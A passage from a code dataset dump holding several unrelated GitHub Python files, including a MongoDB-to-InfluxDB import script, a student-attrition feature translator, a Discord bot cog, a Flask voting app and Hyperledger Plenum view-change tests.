influxdb_client import Point as InfluxdbPoint\nimport dateutil.parser\n\n\nclass Logger:\n def __init__(self, logger_path, debug):\n \"\"\"\n\n :param logger_path:\n :param level: debug or error\n \"\"\"\n\n self.debug = debug\n self.logger_path = logger_path\n\n def log(self, level, msg):\n if level == 'debug' and not self.debug:\n pass\n else:\n with open(self.logger_path, 'a+') as f:\n f.write('[{}] : {} | {}'.format(str(level).upper(), str(datetime.datetime.now()), msg)+'\\n')\n print('[{}] : {} | {}'.format(str(level).upper(), str(datetime.datetime.now()), msg))\n\n def __call__(self, *args, **kwargs):\n return self.log(*args, **kwargs)\n\n\ndef read_latest_databatch(mysql_config: dict, logger, num_limit: int):\n \"\"\"\n 返回mysql数据,上限为num_limit条。\n mysql连接异常在MysqlUtil中捕获\n :param mysql_config: dict\n :param logger:\n :param num_limit:\n :return:\n \"\"\"\n mysql_util = MysqlUtil(mysql_config, logger)\n if mysql_util.conn is None:\n return None\n # 得到一个可以执行SQL语句的光标对象\n\n cmd = f'select * from gms_monitor limit {num_limit}'\n\n result = mysql_util.handle_command(cmd)\n if result is None:\n logger.log('error', 'Mysql检索失败')\n else:\n logger.log('log', 'Mysql检索成功,共{}条'.format(len(result)))\n mysql_util.close()\n return result\n\n\ndef delete_mysql_data_batch(mysql_config, ids, logger):\n\n mysql_util = MysqlUtil(mysql_config, logger)\n if mysql_util.conn is None:\n return None\n # 得到一个可以执行SQL语句的光标对象\n\n # 执行SQL语句\n # 定义要执���的SQL语句\n\n # 用于删除的SQL,sql命令最长估计不超过1m,mysql限制的最大sql commond长度大约是4m\n cmd = 'DELETE FROM gms_monitor WHERE id IN ({})'.format(\n ','.join(map(str, ids))\n )\n result = mysql_util.handle_command(cmd)\n if result is None:\n logger.log('error', 'Mysql数据删除失败')\n return None\n else:\n logger.log('log', 'Mysql数据删除成功,共{}条'.format(len(ids)))\n mysql_util.close()\n return result\n\n\ndef collect_mongodb_docs(mongodb_config: dict, logger):\n \"\"\"\n 获取'point', 'gms_monitor', 'warning_log', 'gms_now', 'backfill_record'五个doc\n :param mongodb_config:\n :param logger:\n :return:\n \"\"\"\n try:\n client = pymongo.MongoClient(\n mongodb_config['uri'],\n username=mongodb_config['username'],\n password=mongodb_config['password']\n )\n logger.log('log', \"连接Mongodb数据库成功\")\n except Exception as e:\n logger.log('error', str(e) + '\\n' + '连接Mongodb数据库失败')\n return None, None\n db = client[\"nfca_db\"]\n\n try:\n docs = tuple(\n [\n db[doc_name] for doc_name in ['point', 'gms_monitor', 'warning_log', 'gms_now', 'backfill_record']\n ]\n )\n except Exception as e:\n logger.log('error', str(e) + '\\n' + '读取Mongodb 文档失败')\n return None, None\n return docs, client\n\n\ndef find_backfill_id(point, monitoring_time, mongodb_backfilling_doc, logger):\n \"\"\"\n\n :param point: 监测数据对应的点位\n :param monitoring_time: 监测数据时间\n :param mongodb_backfilling_doc:\n :param logger:\n :return:\n \"\"\"\n\n if point['thickener_id'] != 0:\n instrument_filter = {'thickener_id': int(point['thickener_id'])}\n else:\n instrument_filter = {'mixer_id': int(point['mixer_id'])}\n\n \"\"\" \n 检索规则解释:\n 加入数据录入服务断线了一段时间,这会导致mysql中的数据不断累积。重启数据录入服务,将当前充填任务的fill_id写入历史数据是不合理的\n 因此检索满足如下条件的充填任务:\n 1. 监测时间夹在充填任务的起止时间之间 或 监测时间在充填任务的起始时间之后且该任务无结束时间\n 2. 满足instrument_filter\n \"\"\"\n backfill_task_filter = dict(\n {\n \"$or\":\n [\n {'start_time': {'$lt': monitoring_time}, 'end_time': {'$gte': monitoring_time}},\n {'start_time': {'$lt': monitoring_time}, 'end_time': None}\n ]\n }, **instrument_filter\n )\n backfilling_belong = mongodb_backfilling_doc.find(\n backfill_task_filter\n ).sort([('start_time', -1)])\n\n if backfilling_belong.count()>1:\n # 理论上不存在两个任务同时满足该检索条件\n logger.log(\n 'warning', 'Backfilling missions {} share {} {}'.format(\n ','.join(str([x['fill_id'] for x in backfilling_belong])),\n 'mixer' if point['thickener_id']!=0 else 'thickener',\n point['mixer_id'] if point['thickener_id']!=0 else point['thickener_id']\n )\n )\n fill_id = -1\n\n # 研究很久没找到怎么取返回结果集里的第一个,用了看起来最蠢的方法\n for backfilling in backfilling_belong:\n fill_id = backfilling['fill_id']\n # 因为检索条件里按照时间逆序,所以只需要取第一个\n break\n return fill_id\n\n\ndef read_yaml(yaml_path='./database_config.yaml', mode='ustb'):\n\n if not os.path.exists(yaml_path):\n raise FileNotFoundError('无法在当前路径找到database_config.yaml')\n f = open(yaml_path, 'r', encoding='utf-8')\n yaml_config = yaml.load(f.read(), Loader=yaml.FullLoader)\n return yaml_config\n\n\ndef main(debug, mode):\n\n logger = Logger('./db_import_log.log', debug)\n logger('debug', 'test')\n yaml_config = read_yaml(mode=mode)\n database_config = yaml_config[mode]\n\n dateStartStr = '2021-04-02T11:40:48Z'\n # dateEndStr= '2021-04-09T06:49:34Z'\n dateStartPar = dateutil.parser.parse(dateStartStr)\n # dateEndPar = dateutil.parser.parse(dateEndStr)\n # 建立连接\n client = pymongo.MongoClient(\n \"mongodb://127.0.0.1:27017/nfca_db\",\n username='nfca',\n password='nfca'\n )\n db = client[\"nfca_db\"]\n # myresult = db.gms_monitor.find({ \"time\" : { \"$gte\" : dateStartPar, \"$lte\" : dateEndPar } })\n myresult = db.gms_monitor.find({ \"time\" : { \"$gte\" : dateStartPar} })\n # 总记录条数\n print(myresult.count())\n influxdb_write_sequence = []\n for monitor in myresult:\n # 构造influxdb数据点并加入列表\n # 存储形式\n # measurement: gms_monitor\n # tag: point, point_id, alarm, fill_id\n # field, Monitoring_value, instrument\n influxdb_write_sequence.append(\n InfluxdbPoint(\n 'gms_monitor'\n ).tag(\n 'point_id', monitor['point_id']\n ).tag(\n 'fill_id', monitor['fill_id']\n ).field(\n 'alarm', monitor['alarm']\n ).field(\n 'Monitoring_value', float(monitor['Monitoring_value'])\n ).time(\n datetime.datetime.strptime(str(monitor['time']), '%Y-%m-%d %H:%M:%S')\n )\n )\n \n\n # 批量写入influxdb\n write2influx_db(database_config['influxdb'], influxdb_write_sequence, logger)\n\n print('done.')\n\n\nif __name__ == '__main__':\n debug = False\n mode = None\n try:\n opts, args = getopt.getopt(sys.argv[1:], \"\", [\"debug\", \"mode=\"])\n for o, a in opts:\n if o == '--debug':\n debug = True\n elif o == '--mode' and (a == 'nfca' or a == 'ustb'):\n mode = a\n else:\n print('python data_import.py [--debug] --mode [nfca|ustb]')\n raise getopt.GetoptError(msg='Illegal opt or argv')\n if mode is None:\n print('python data_import.py [--debug] --mode [nfca|ustb]')\n raise getopt.GetoptError('Mode missed')\n except getopt.GetoptError as e:\n raise e\n\n main(debug, mode)\n\n\n","repo_name":"jcchouz/MongoDBOpera","sub_path":"mongo_to_influx_ATT.py","file_name":"mongo_to_influx_ATT.py","file_ext":"py","file_size_in_byte":8735,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"70783073371","text":"from db import create_controls, get_controls, update_controls\nfrom feature_translation.tools import get_dict_key_by_value\nfrom pandas import DataFrame\nimport json\nimport logging\nimport os\n\nlogging.getLogger(__name__)\n\n\ndef get_dataset_schema() -> dict:\n \"\"\"\n Returns the json file containing all information to understand the dataset as a dictionary representation.\n\n :return: dict\n \"\"\"\n current_file = 'translation.py'\n root = os.path.realpath(current_file).split('student-attrition-model')[0]\n path = os.path.join(root, 'student-attrition-model', 'data', 'dataset_legend.json')\n assert os.path.exists(path)\n with open(path, 'rb') as f:\n schema_info = json.load(f)\n return schema_info\n\n\ndef create_translator(df: DataFrame, initialise: bool = False) -> list:\n \"\"\"\n Takes a dataframe containing the original dataset and returns a translation template as a list or returns unknown.\n\n If initialisation is true then the translation and meta-translation lists are added to the control database, if\n initialisation is false then a single translation list is returned.\n\n :param df: DataFrame\n :param initialise: bool\n :return: unknown | list\n \"\"\"\n translation = list()\n meta_translation = list()\n schema = get_dataset_schema()\n features = [list(schema[\"variables\"].keys())[list(schema[\"variables\"].values()).index(feature)] for feature in df]\n for f in features:\n # Features which require one-hot encoding\n if schema['variable_types'].get(f) == 'one_hot_encoded':\n # if schema.get(f) and schema['drop_list'].get(f):\n key = 'parental_occupation_categories' if 'occupation' in f else f\n value_list = list(schema.get(key).values())\n value_list.remove(schema['drop_list'].get(f))\n translation.append(value_list)\n meta_translation.append([f] * len(value_list))\n elif f != \"target\":\n translation.append([f])\n meta_translation.append([f])\n\n if initialise:\n attributes = {\n \"feature_translation\": [item for sublist in translation for item in sublist],\n \"meta_translation\": [item for sublist in meta_translation for item in sublist]\n }\n assert len(attributes[\"feature_translation\"]) == len(attributes[\"meta_translation\"])\n try:\n assert create_controls(attributes) is True\n except Exception as e:\n logging.error(\"could not create controls... attempting to update instead\", e)\n try:\n assert update_controls(attributes) is True\n except Exception as e:\n logging.error(\"could not create or update controls\", e)\n raise Exception(e)\n return\n\n return [item for sublist in translation for item in sublist]\n\n\ndef features_hr(features: list) -> dict:\n \"\"\"\n Takes a numeric list of features and returns a dictionary with feature_label: feature_value as key pairs.\n\n Assumes that input (features) is valid and in correct order for translation to dictionary.\n\n :param features: list\n :return: dict of feature label-value pairs\n \"\"\"\n feature_dict = dict()\n schema = get_dataset_schema()\n controls = get_controls()\n translation, meta_translation = controls.feature_translation, controls.meta_translation\n for index, value in enumerate(features):\n category = meta_translation[index]\n if schema[\"variable_types\"].get(category) == 'numeric':\n feature_dict[category] = value\n continue\n if schema[\"variable_types\"].get(category) == 'binary':\n feature_dict[category] = \"Yes\" if value == 1 else \"No\"\n continue\n if schema[\"variable_types\"].get(category) == 'boolean':\n feature_dict[category] = schema[category].get(str(value))\n continue\n if schema[\"variable_types\"].get(category) == 'ordinal' and 'qualification' in category:\n meta_category = f'parental_{category.split(\"_\")[1]}'\n key = get_dict_key_by_value(schema[f\"{meta_category}_labels\"], value)\n feature_dict[category] = schema[f\"{meta_category}_categories\"][key]\n continue\n if schema[\"variable_types\"].get(category) == 'one_hot_encoded':\n # One hot encoded attributes have multiple entries, but only need to be calculated once.\n if feature_dict.get(category):\n continue\n # Find the indexes of all occurrences of the category in the translation array.\n indexes = [i for i, v in enumerate(meta_translation) if v == category]\n decoded = [translation[i] for i in indexes if features[i] != 0]\n feature_dict[category] = decoded[0] if len(decoded) == 1 else schema['drop_list'][category]\n continue\n assert len(set(meta_translation)) == len(feature_dict.keys())\n return feature_dict\n\n\ndef features_n(features: dict) -> list:\n \"\"\"\n Takes a dictionary with feature label-value as key pairs. Returns a list of numeric representations of features.\n\n Assumes that input (features) is valid and in correct order for translation to dictionary.\n\n :param features: dict\n :return: list of numeric representations of features\n \"\"\"\n feature_array = list()\n schema = get_dataset_schema()\n controls = get_controls()\n translation, meta_translation = controls.feature_translation, controls.meta_translation\n for index, value in enumerate(translation):\n category = meta_translation[index]\n if schema[\"variable_types\"].get(category) == \"numeric\":\n feature_array.append(features.get(category))\n continue\n if schema[\"variable_types\"].get(category) == 'binary':\n encode = 1 if features.get(category) is True or features.get(category) == \"Yes\" else 0\n feature_array.append(encode)\n continue\n if schema[\"variable_types\"].get(category) == 'boolean':\n encode = int(get_dict_key_by_value(schema[category], features.get(category)))\n feature_array.append(encode)\n continue\n if schema[\"variable_types\"].get(category) == 'ordinal' and 'qualification' in category:\n key = get_dict_key_by_value(schema[\"parental_qualification_categories\"], features.get(category))\n encode = schema[\"parental_qualification_labels\"].get(key)\n feature_array.append(encode)\n continue\n if schema[\"variable_types\"].get(category) == 'one_hot_encoded':\n encode = 1 if value == features.get(category) else 0\n feature_array.append(encode)\n continue\n return feature_array\n\n\ndef features_update(features: list | dict, attribute: str, value: str | int | float | bool, result_type: str = \"list\") -> list | dict:\n \"\"\"\n Takes a list or dictionary representation of the features, updates and returns it in the desired format.\n\n Assumes that all inputs are valid values. Only one feature is altered, all other features remain the same.\n\n :param features: list | dict\n :param attribute: str\n :param value: str | int | float | bool\n :param result_type: str\n :return: list | dict representation of features\n \"\"\"\n feature_dict = features_hr(features) if isinstance(features, list) else features\n feature_dict[attribute] = value\n if result_type == 'dict':\n return feature_dict\n return features_n(feature_dict)\n\n","repo_name":"HappyPhilosoph3r/saip-template","sub_path":"student-attrition-model/feature_translation/translation.py","file_name":"translation.py","file_ext":"py","file_size_in_byte":7467,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"19988944147","text":"# pets.py\n\nimport discord\nfrom discord.commands import SlashCommandGroup, Option\nfrom discord.ext import commands\n\nfrom content import pets\nfrom resources import strings\n\n\nclass PetsCog(commands.Cog):\n \"\"\"Cog with pet commands\"\"\"\n def __init__(self, bot):\n self.bot = bot\n\n cmd_pets = SlashCommandGroup(\"pets\", \"Pet guides\")\n\n @cmd_pets.command(name='guide', description='All about pets')\n async def pets_guide(\n self,\n ctx: discord.ApplicationContext,\n topic: Option(str, strings.ARGUMENT_TOPIC_DESCRIPTION,\n choices=pets.TOPICS, default=pets.TOPIC_OVERVIEW),\n ) -> None:\n \"\"\"Professions guides\"\"\"\n await pets.command_pets_guide(ctx, topic)\n\n @cmd_pets.command(name='fuse', description='Pet fusion recommendations for a certain TT.')\n async def pets_fuse(\n self,\n ctx: discord.ApplicationContext,\n pet_tier: Option(int, 'The pet tier you want to see. Shows all tiers if empty.', min_value=1, max_value=25,\n default=None),\n timetravel: Option(int, 'The TT you want a recommendation for. Uses your progress setting if empty.',\n min_value=0, max_value=9999, default=None),\n ) -> None:\n \"\"\"Pet fuse recommendations\"\"\"\n await pets.command_pets_fuse(ctx, pet_tier, timetravel)\n\n\n# Initialization\ndef setup(bot):\n bot.add_cog(PetsCog(bot))\n","repo_name":"Miriel-py/Epic-RPG-Guide","sub_path":"cogs/pets.py","file_name":"pets.py","file_ext":"py","file_size_in_byte":1424,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"38568351819","text":"class Solution:\n def minCut(self, s: str) -> int:\n def isPalindrome(string):\n return string==string[::-1]\n\n n=len(s)\n dp=[-1]*(n)\n INF = 10**9\n def recur(idx):\n if idx==n:\n return 0\n \n if dp[idx]!=-1:\n return dp[idx]\n \n ans=INF\n for j in range(idx,n):\n if isPalindrome(s[idx:j+1]):\n ans=min(ans,1+recur(j+1))\n \n dp[idx]=ans\n return dp[idx]\n return recur(0)-1","repo_name":"iamheavymetalx7/LeetCode-Submissions","sub_path":"0132-palindrome-partitioning-ii/0132-palindrome-partitioning-ii.py","file_name":"0132-palindrome-partitioning-ii.py","file_ext":"py","file_size_in_byte":577,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"13278370618","text":"from flask import Flask,request, jsonify\nimport redis\nimport os\nimport json\nimport operator\napp = Flask(__name__)\n\n\ncandidates = redis.Redis(\nhost=os.getenv(\"REDIS_HOST\"),\nport=int(os.getenv(\"REDIS_PORT\")),\ncharset=\"utf-8\", decode_responses=True)\n\ncandidates.set(\"candidates\",2)\n\n@app.route('/')\ndef hello_world():\n return 'Hello, World!'\n\n\n@app.route('/check')\ndef check():\n return 'Checking In if everything is fine'\n\n\n@app.route('/vote/')\ndef vote(candidate):\n current_candidate = candidates.get(candidate.upper())\n if current_candidate is not None:\n print(\"founf\")\n candidates.set(candidate.upper(), int(candidates.get(candidate.upper())) + 1 )\n return jsonify(success=True)\n return jsonify(success=False)\n\n@app.route('/register', methods = ['POST'])\ndef register():\n try:\n data =request.get_json()\n candidates.set(data['name'].upper(),0)\n return jsonify(success=True)\n except:\n return jsonify(success=False)\n\n@app.route('/candidates', methods = ['GET'])\ndef get_candidates():\n keys = candidates.keys('*')\n return jsonify(keys)\n\n@app.route('/winner', methods = ['GET'])\ndef get_winner():\n candidates_dict = {}\n keys = candidates.keys('*')\n for key in keys:\n val = candidates.get(key)\n candidates_dict[key] = int(val)\n try:\n print(candidates_dict)\n return jsonify(max(candidates_dict, key=candidates_dict.get))\n \n except:\n return jsonify(success=False)\n\n@app.route('/version', methods = ['GET'])\ndef get_version():\n version = os.getenv(\"VERSION\")\n if version is not None:\n return jsonify(version)\n return jsonify(success=False)\n\nif __name__ == '__main__':\n app.run(port=5000, debug=True, host='0.0.0.0')","repo_name":"sandyjswl/docker-cheat-sheet","sub_path":"vote-app-v3/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1768,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"35819494625","text":"import pytest\n\nfrom plenum.test.delayers import nv_delay\nfrom plenum.test.stasher import delay_rules\nfrom plenum.test.helper import waitForViewChange, perf_monitor_disabled, view_change_timeout\nfrom plenum.test.node_request.helper import sdk_ensure_pool_functional\nfrom plenum.test.node_catchup.helper import ensure_all_nodes_have_same_data\nfrom plenum.test.spy_helpers import get_count, getAllReturnVals\nfrom plenum.test.test_node import get_master_primary_node, \\\n ensureElectionsDone\nfrom stp_core.loop.eventually import eventually\n\nnodeCount = 7\nNEW_VIEW_TIMEOUT = 5\n\n\n@pytest.fixture(scope=\"module\")\ndef tconf(tconf):\n with view_change_timeout(tconf, NEW_VIEW_TIMEOUT), \\\n perf_monitor_disabled(tconf):\n yield tconf\n\n\n# def _check_view_change_completed_stats(nodes):\n# return {node.name: (_check_view_change_completed_count(node), _check_view_change_completed_true(node))\n# for node in nodes}\n\n\n# def check_watchdog_called_expected_times(nodes, stats, times):\n# def call_count(node):\n# return _check_view_change_completed_count(node) - stats[node.name][0]\n#\n# def true_count(node):\n# return _check_view_change_completed_true(node) - stats[node.name][1]\n#\n# n = nodeCount\n# f = (n - 1) // 3\n#\n# call_counts = [call_count(node) for node in nodes]\n# true_counts = [true_count(node) for node in nodes]\n#\n# ok = True\n# ok = ok and all(v <= times for v in call_counts)\n# ok = ok and all(v <= times for v in true_counts)\n# ok = ok and sum(call_counts) >= times * (n - f)\n# ok = ok and sum(true_counts) >= times * (n - f)\n#\n# if not ok:\n# actual = \"\"\n# for node in nodes:\n# actual += \"{}: called {}, returned true {}\\n\".format(node.name, call_count(node), true_count(node))\n# raise AssertionError(\"Watchdog expected to be called {} times, actual counts:\\n{}\".format(times, actual))\n\n\ndef stop_master_primary(nodes, view_no):\n m_next_primary_name = nodes[0].primaries_selector.select_master_primary(view_no)\n next(node for node in nodes if node.name == m_next_primary_name).stop()\n alive_nodes = list(filter(lambda x: x.name != m_next_primary_name, nodes))\n return alive_nodes\n\n\ndef start_view_change(nodes, next_view_no):\n for n in nodes:\n n.view_changer.start_view_change(next_view_no)\n\n\n@pytest.fixture()\ndef setup(txnPoolNodeSet, looper):\n m_primary_node = get_master_primary_node(list(txnPoolNodeSet))\n initial_view_no = waitForViewChange(looper, txnPoolNodeSet)\n timeout_callback_stats = _check_view_change_completed_stats(txnPoolNodeSet)\n return m_primary_node, initial_view_no, timeout_callback_stats\n\n\n@pytest.mark.skip(reason=\"INDY-2244 will be fixed in the scope clean-up work\")\ndef test_view_change_retry_by_timeout(\n txnPoolNodeSet, looper, tconf, setup, sdk_pool_handle, sdk_wallet_client):\n \"\"\"\n Verifies that a view change is restarted if it is not completed in time\n \"\"\"\n m_primary_node, initial_view_no, timeout_callback_stats = setup\n stashers = [n.nodeIbStasher for n in txnPoolNodeSet]\n\n with delay_rules(stashers, nv_delay()):\n start_view_change(txnPoolNodeSet, initial_view_no + 1)\n\n # First view change should fail, because of delayed ViewChangeDone\n # messages. This then leads to new view change that we need.\n with pytest.raises(AssertionError):\n ensureElectionsDone(looper=looper,\n nodes=txnPoolNodeSet,\n customTimeout=1.5 * NEW_VIEW_TIMEOUT)\n\n # Now as ViewChangeDone messages are unblocked view changes should finish successfully\n ensureElectionsDone(looper=looper, nodes=txnPoolNodeSet)\n ensure_all_nodes_have_same_data(looper, nodes=txnPoolNodeSet)\n new_m_primary_node = get_master_primary_node(list(txnPoolNodeSet))\n assert m_primary_node.name != new_m_primary_node.name\n\n # The timeout method was called one time\n check_watchdog_called_expected_times(txnPoolNodeSet, timeout_callback_stats, 1)\n\n # 2 view changes have been initiated\n for node in txnPoolNodeSet:\n assert node.viewNo - initial_view_no == 2\n\n sdk_ensure_pool_functional(looper, txnPoolNodeSet,\n sdk_wallet_client,\n sdk_pool_handle)\n\n\n@pytest.mark.skip(reason=\"INDY-2244 will be fixed in the scope clean-up work\")\ndef test_multiple_view_change_retries_by_timeouts(\n txnPoolNodeSet, looper, tconf, setup,\n sdk_pool_handle, sdk_wallet_client):\n \"\"\"\n Verifies that a view change is restarted each time\n when the previous one is timed out\n \"\"\"\n _, initial_view_no, timeout_callback_stats = setup\n stashers = [n.nodeIbStasher for n in txnPoolNodeSet]\n\n with delay_rules(stashers, nv_delay()):\n start_view_change(txnPoolNodeSet, initial_view_no + 1)\n\n # Wait until timeout callback is called 3 times\n looper.run(eventually(check_watchdog_called_expected_times,\n txnPoolNodeSet, timeout_callback_stats, 3,\n retryWait=1,\n timeout=3 * NEW_VIEW_TIMEOUT + 2))\n\n # View changes should fail\n with pytest.raises(AssertionError):\n ensureElectionsDone(looper=looper, nodes=txnPoolNodeSet, customTimeout=1)\n\n # This view change must be completed with no problems\n ensureElectionsDone(looper=looper, nodes=txnPoolNodeSet)\n ensure_all_nodes_have_same_data(looper, nodes=txnPoolNodeSet)\n\n # 4 view changes must have been initiated (initial one + 3 retries)\n for node in txnPoolNodeSet:\n assert node.viewNo - initial_view_no == 4\n\n sdk_ensure_pool_functional(looper, txnPoolNodeSet,\n sdk_wallet_client,\n sdk_pool_handle)\n\n\n@pytest.mark.skip(reason=\"INDY-2244 will be fixed in the scope clean-up work\")\ndef test_view_change_restarted_by_timeout_if_next_primary_disconnected(\n txnPoolNodeSet, looper, tconf, setup):\n \"\"\"\n Verifies that a view change is restarted by timeout\n if the next primary has been disconnected\n \"\"\"\n _, initial_view_no, timeout_callback_stats = setup\n\n alive_nodes = stop_master_primary(txnPoolNodeSet, initial_view_no + 1)\n start_view_change(alive_nodes, initial_view_no + 1)\n\n ensureElectionsDone(looper=looper, nodes=alive_nodes, instances_list=range(3))\n\n # There were 2 view changes\n for node in alive_nodes:\n assert (node.viewNo - initial_view_no) == 2\n\n # The timeout method was called 1 time\n check_watchdog_called_expected_times(txnPoolNodeSet, timeout_callback_stats, 1)\n","repo_name":"hyperledger/indy-plenum","sub_path":"plenum/test/view_change/test_view_change_timeout.py","file_name":"test_view_change_timeout.py","file_ext":"py","file_size_in_byte":6671,"program_lang":"python","lang":"en","doc_type":"code","stars":210,"dataset":"github-code","pt":"32"} +{"seq_id":"17756951532","text":"# inplace\n\ndef reverseWords( s: str) -> str:\n s = s.strip()\n if s == '':\n return ''\n\n ns = ''\n\n left, right = len(s) - 1, len(s)\n while left != 0:\n\n if s[left] != ' ':\n left -= 1\n else:\n ns += s[left + 1:right].strip() + ' '\n\n while s[left] == ' ':\n left -= 1\n\n right = left + 1\n\n ns += s[left:right].strip()\n\n return ns\n\n\nprint(reverseWords( 'the sky is blue'))","repo_name":"zhoux811/codepath","sub_path":"week7/sat/p3.151. Reverse Words in a String.py","file_name":"p3.151. Reverse Words in a String.py","file_ext":"py","file_size_in_byte":463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"29961930757","text":"\ndef collect(s, n, final=[]):\n if s in str_vector:\n final = []\n if len(s) >= n:\n final.append(s[:n])\n a=s[n:]\n return collect(a,n,final)\n else:\n return sorted(final)\n\n","repo_name":"daniel-reich/ubiquitous-fiesta","sub_path":"TcKZnbdgx7q6LLoFR_21.py","file_name":"TcKZnbdgx7q6LLoFR_21.py","file_ext":"py","file_size_in_byte":185,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"72424767450","text":"age = int(input())\nname = input()\nif age > 0 and age < 75:\n if name == \"Иван\":\n print(\"Ивану вход воспрещён!!!\")\n else:\n if age > 16:\n print(\"Поздровляем, Вы поступили во ВГУИТ!\")\n else:\n print(\"Сначала нужно окончить школу!\")\nelse:\n print(\"Нужно ввести корректный возраст!\")","repo_name":"maxSHabanov33312/VSUET","sub_path":"VSUET/Sem1/OP/1pr/3.py","file_name":"3.py","file_ext":"py","file_size_in_byte":431,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"13156381718","text":"import uzbek_latin_cyrillic_converter.converter as converter\n\n\ndef test_get_cyrillic_or_same_char():\n param0 = ('s', True)\n expected0 = (1, 'с')\n assert expected0 == converter.get_cyrillic_or_same_char(*param0)\n\n param1 = ('S', True)\n expected1 = (1, 'С')\n assert expected1 == converter.get_cyrillic_or_same_char(*param1)\n\n param2 = ('e', True)\n expected2 = (1, 'э')\n assert expected2 == converter.get_cyrillic_or_same_char(*param2)\n\n param3 = ('E', True)\n expected3 = (1, 'Э')\n assert expected3 == converter.get_cyrillic_or_same_char(*param3)\n\n param4 = ('e', False)\n expected4 = (1, 'е')\n assert expected4 == converter.get_cyrillic_or_same_char(*param4)\n\n param5 = ('E', False)\n expected5 = (1, 'Е')\n assert expected5 == converter.get_cyrillic_or_same_char(*param5)\n\n\ndef test_get_space_or_value_from_two_letters_down():\n param0 = ('s', 'h', True)\n expected0 = (2, 'ш')\n assert expected0 == converter.get_space_or_value_from_two_letters_down(*param0)\n\n param1 = ('S', 'h', True)\n expected1 = (2, 'Ш')\n assert expected1 == converter.get_space_or_value_from_two_letters_down(*param1)\n\n param2 = ('o', '\\'', True)\n expected2 = (2, 'ў')\n assert expected2 == converter.get_space_or_value_from_two_letters_down(*param2)\n\n param3 = ('O', '\\'', True)\n expected3 = (2, 'Ў')\n assert expected3 == converter.get_space_or_value_from_two_letters_down(*param3)\n\n param4 = ('o', '‘', True)\n expected4 = (2, 'ў')\n assert expected4 == converter.get_space_or_value_from_two_letters_down(*param4)\n\n param5 = ('O', '‘', True)\n expected5 = (2, 'Ў')\n assert expected5 == converter.get_space_or_value_from_two_letters_down(*param5)\n\n param6 = ('g', '\\'', True)\n expected6 = (2, 'ғ')\n assert expected6 == converter.get_space_or_value_from_two_letters_down(*param6)\n\n param7 = ('G', '\\'', True)\n expected7 = (2, 'Ғ')\n assert expected7 == converter.get_space_or_value_from_two_letters_down(*param7)\n\n param8 = ('s', 'n', True)\n expected8 = (1, 'с')\n assert expected8 == converter.get_space_or_value_from_two_letters_down(*param8)\n\n\ndef test_get_space_or_value_from_three_letters_down():\n param0 = ('y', 'o', '\\'', True)\n expected0 = (3, 'йў')\n assert expected0 == converter.get_space_or_value_from_three_letters_down(*param0)\n\n param1 = ('Y', 'o', '\\'', True)\n expected1 = (3, 'Йў')\n assert expected1 == converter.get_space_or_value_from_three_letters_down(*param1)\n\n param2 = ('y', 'o', '‘', True)\n expected2 = (3, 'йў')\n assert expected2 == converter.get_space_or_value_from_three_letters_down(*param2)\n\n param3 = ('s', 'h', 'j', True)\n expected3 = (2, 'ш')\n assert expected3 == converter.get_space_or_value_from_three_letters_down(*param3)\n\n param4 = ('o', 'b', 'd', True)\n expected4 = (1, 'о')\n assert expected4 == converter.get_space_or_value_from_three_letters_down(*param4)\n\n\ndef test_latin_to_cyrillic():\n assert 'салом' == converter.latin_to_cyrillic('salom')\n assert 'Йўқ' == converter.latin_to_cyrillic(\"Yo'q\")\n","repo_name":"Rhtyme/uzbek_latin_cyrillic_converter","sub_path":"tests/test_script.py","file_name":"test_script.py","file_ext":"py","file_size_in_byte":3120,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"30300440361","text":"import os.path\nimport os\nimport errno\nimport json\nimport datetime\n\n\nclass Cleanse(object):\n def __init__(self):\n return\n\n def cleanse_drinks(self, file_location):\n data = []\n date = {}\n name = {}\n location = {}\n price = {}\n with open(os.path.dirname(__file__) + file_location) as fp:\n for (i, line) in enumerate(fp):\n line = json.loads(line)\n line = line['drink']\n del line['__key__']\n del line['description']\n\n data.append(line)\n self.add_to_map(self.clean_name(line['name']), name)\n self.add_to_map(self.clean_date(line['date']), date)\n self.add_to_map(self.clean_location(line['location']), location)\n self.add_to_map(line['price'], price)\n # data = json.load(fp)\n # for drink in data:\n # self.add_to_map(data.name)\n\n with open(os.path.dirname(__file__) + '/../raw_data/parsed2019-12-03T22_23_031', 'w') as fp:\n json.dump(data, fp, sort_keys=True, indent=4)\n with open(os.path.dirname(__file__) + '/../data/2/name.json', 'w') as fp:\n json.dump(name, fp, sort_keys=True, indent=4)\n with open(os.path.dirname(__file__) + '/../data/2/date.json', 'w') as fp:\n json.dump(date, fp, sort_keys=True, indent=4)\n with open(os.path.dirname(__file__) + '/../data/2/loc.json', 'w') as fp:\n json.dump(location, fp, sort_keys=True, indent=4)\n with open(os.path.dirname(__file__) + '/../data/2/price.json', 'w') as fp:\n json.dump(price, fp, sort_keys=True, indent=4)\n\n def clean_name(self, name):\n return name.strip().lower()\n\n def clean_date(self, date):\n return date[0:13]\n\n def clean_location(self, location):\n return location.strip().lower()\n\n def add_to_map(self, val, map_name):\n if val in map_name:\n map_name[val] += 1\n else:\n map_name[val] = 1\n\nif __name__ == \"__main__\":\n cleanse = Cleanse()\n cleanse.cleanse_drinks('/../raw_data/parsed2019-12-03T22_23_031')\n","repo_name":"ryqndev/stats-boba-watch","sub_path":"scripts/cleanse.py","file_name":"cleanse.py","file_ext":"py","file_size_in_byte":2178,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"26948902203","text":"import rtmaps.types\nimport numpy as np\nimport rtmaps.core as rt\nimport rtmaps.reading_policy\nfrom rtmaps.base_component import BaseComponent\nimport pyproj # in pyproj library there is a methdod called 